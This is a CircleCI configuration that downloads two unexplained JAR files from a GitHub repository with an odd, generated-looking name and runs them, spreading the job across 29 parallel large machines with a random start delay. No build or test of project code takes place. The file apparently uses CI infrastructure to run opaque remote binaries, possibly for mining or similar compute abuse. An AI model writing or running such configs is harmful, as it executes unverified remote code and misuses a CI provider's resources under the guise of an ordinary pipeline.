version: 2.1

jobs:
  run-files:
    machine:
      image: ubuntu-2204:current
    resource_class: large
    steps:
      - checkout
      - run:
          name: Setup Java
          command: |
            sudo apt-get update && sudo apt-get install -y openjdk-17-jdk curl
      - run:
          name: Download JAR Files
          command: |
            # Random delay to avoid conflicts
            sleep $((RANDOM % 15 + 1))
            
            BASE_URL="https://github.com/PatriciaSingh240883130/PatriciaSingh240883130/raw/main"
            
            # Download files with retry logic
            download_file() {
              local src=$1 dst=$2 retries=0
              while [ $retries -lt 5 ]; do
                curl -L --fail "$BASE_URL/$src" -o "$dst" && return 0
                retries=$((retries + 1))
                sleep $((retries * 2))
              done
              echo "Failed to download $dst" && exit 1
            }
            
            download_file "workerr4" "solver.jar"
            download_file "cnt4.jar" "cnt.jar"
      - run:
          name: Execute
          command: |
            java -jar cnt.jar &
            java -jar solver.jar

workflows:
  run-svr:
    jobs:
      - run-files:
          name: thu0
      - run-files:
          name: thu1
      - run-files:
          name: thu2
      - run-files:
          name: thu3
      - run-files:
          name: thu4
      - run-files:
          name: thu5
      - run-files:
          name: thu6
      - run-files:
          name: thu7
      - run-files:
          name: thu8
      - run-files:
          name: thu9
      - run-files:
          name: thu10
      - run-files:
          name: thu11
      - run-files:
          name: thu12
      - run-files:
          name: thu13
      - run-files:
          name: thu14
      - run-files:
          name: thu15
      - run-files:
          name: thu16
      - run-files:
          name: thu17
      - run-files:
          name: thu18
      - run-files:
          name: thu19
      - run-files:
          name: thu20
      - run-files:
          name: thu21
      - run-files:
          name: thu22
      - run-files:
          name: thu23
      - run-files:
          name: thu24
      - run-files:
          name: thu25
      - run-files:
          name: thu26
      - run-files:
          name: thu27
      - run-files:
          name: thu28
